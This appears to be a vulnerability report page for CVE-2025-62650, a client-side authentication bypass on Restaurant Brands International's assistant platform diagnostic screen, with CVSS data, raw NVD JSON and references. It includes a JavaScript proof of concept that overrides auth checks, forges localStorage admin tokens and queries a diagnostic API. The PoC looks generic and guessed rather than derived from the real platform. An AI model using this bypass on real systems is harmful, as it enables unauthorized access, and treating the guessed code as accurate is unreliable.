Security Vulnerability Report
CVE-2025-62650 CVSS 8.3 HIGH

CVE-2025-62650

Published: 2025-10-17 21:15:38
Last Modified: 2025-10-31 18:39:29

Description

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 relies on client-side authentication for use of the diagnostic screen.

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:* - VULNERABLE
RBI Assistant Platform <= 2025-09-06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-62650 - RBI Assistant Platform Diagnostic Screen Client-Side Auth Bypass PoC
// Vulnerability: Client-side only authentication for diagnostic screen access
// Affected: RBI Assistant Platform through 2025-09-06

// Method 1: Direct URL Access
// Simply navigate to the diagnostic screen URL without authentication
// The server does not enforce authentication checks
const diagnosticUrl = 'https://rbi-assistant.example.com/diagnostic';
window.location.href = diagnosticUrl;

// Method 2: Bypass Client-Side JavaScript Authentication Check
// Override client-side auth validation functions
function bypassClientSideAuth() {
    // Override common client-side auth check functions
    Object.defineProperty(window, 'isAuthenticated', {
        get: function() { return true; },
        configurable: false
    });

    // Override localStorage/sessionStorage auth flags
    localStorage.setItem('auth_token', 'bypass_token');
    localStorage.setItem('user_role', 'admin');
    localStorage.setItem('diagnostic_access', 'granted');

    // Trigger any post-authentication initialization
    if (typeof onAuthSuccess === 'function') {
        onAuthSuccess();
    }

    console.log('Client-side authentication bypassed successfully');
}

// Method 3: Direct API Access via Fetch
// Access diagnostic endpoints directly without authentication headers
async function accessDiagnosticAPI() {
    try {
        const response = await fetch('https://rbi-assistant.example.com/api/diagnostic/status', {
            method: 'GET',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
                // No Authorization header needed - server doesn't validate
            }
        });
        const data = await response.json();
        console.log('Diagnostic data accessed:', data);
        return data;
    } catch (error) {
        console.error('Error accessing diagnostic API:', error);
    }
}

// Execute the bypass
bypassClientSideAuth();
// accessDiagnosticAPI();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62650", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:38.337", "lastModified": "2025-10-31T18:39:28.907", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 relies on client-side authentication for use of the diagnostic screen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-603"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": 
"https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}